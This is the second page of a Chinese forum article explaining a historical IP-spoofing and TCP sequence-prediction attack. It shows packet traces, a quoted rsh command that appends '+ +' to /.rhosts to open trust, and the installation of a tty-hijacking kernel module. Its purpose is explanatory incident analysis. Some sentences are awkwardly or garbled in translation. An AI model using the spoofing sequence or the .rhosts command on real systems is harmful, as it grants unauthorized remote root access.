计算机故障交流论坛
域名注册
当前位置:首页 >> 木马病毒 >> 正文

利用ip序列攻击办法详解

发表时间:09-6-17   来源:计算机故障网   点击:

  通常情况下, SYN-ACK 的数列需要用来生成有效的 ACK. 虽然这样,攻击者可以预知序列

  包含在 SYN-ACK 中,基于已知的x-terminal的 tcp 序列生成规律,下面还可以 用 ACK 来对付

  那些没有看见的 SYN-ACK :

  14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096

  14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096

  现在被 spoofing 的机器现在只有一种方法连接到x-terminal.shell服务器就是 server.login.

  它可以维护连接 connection 和 send 请求可以通过完全ACK 掉。应该像下面这样:

  14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096

  14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096

  14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096

  相当于:

  14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"

  从第一个 spoofed 的数据包共用了: < 16 秒的时间

  欺骗的;连接已经被终止了:

  14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096

  14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096

  14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096

  14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096

  14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096

  我们现在看到 RST 释放了在 server.login 上的队列中的那些半连接和空连接:

  14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096

  14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096

  14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096

  14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096

  14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096

  14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096

  14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096

  14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096

  14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096

  14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096

  14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096

  14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096

  14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096

  14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096

  14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096

  14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096

  14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096

  14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096

  14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096

  14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096

  14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096

  14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096

  14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096

  14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096

  14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096

  14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096

  14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096

  14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096

  14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096

  14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096

  server.login 又可以接受连接请求了.

  通过IP地址spoofing 成果获得root权限后,一个叫做"tap-2.01"的内核模块被x-terminal

  编译和安装:

  x-terminal% modstat

  Id Type Loadaddr Size B-major C-major Sysnum Mod Name

  1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha

  x-terminal% ls -l /dev/tap

  crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap

  这是一个出现 内核 STREAMS 模块 ,可以防到已有的 STREAMS 堆栈和控制 tty device 上面的用户.

第1页:利用ip序列攻击(1)   第2页:利用ip序列攻击(2)  

上一篇:微软IE再次曝重大漏洞 主流操作系统无一幸免    下一篇:手动解决微软ActiveX控件的安全隐患
【收藏】  【推荐】  【返回顶部】  【打印本页】  【关闭窗口】

相关文章列表

最新文章

本月排行榜

文章推荐


关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助

© CopyRight 2008-2010, JSJGZ.CN, 计算机故障 Inc. All Rights Reserved

闽ICP备09000710号 增值电信业务经营许可证闽B2-20080004号 Rss订阅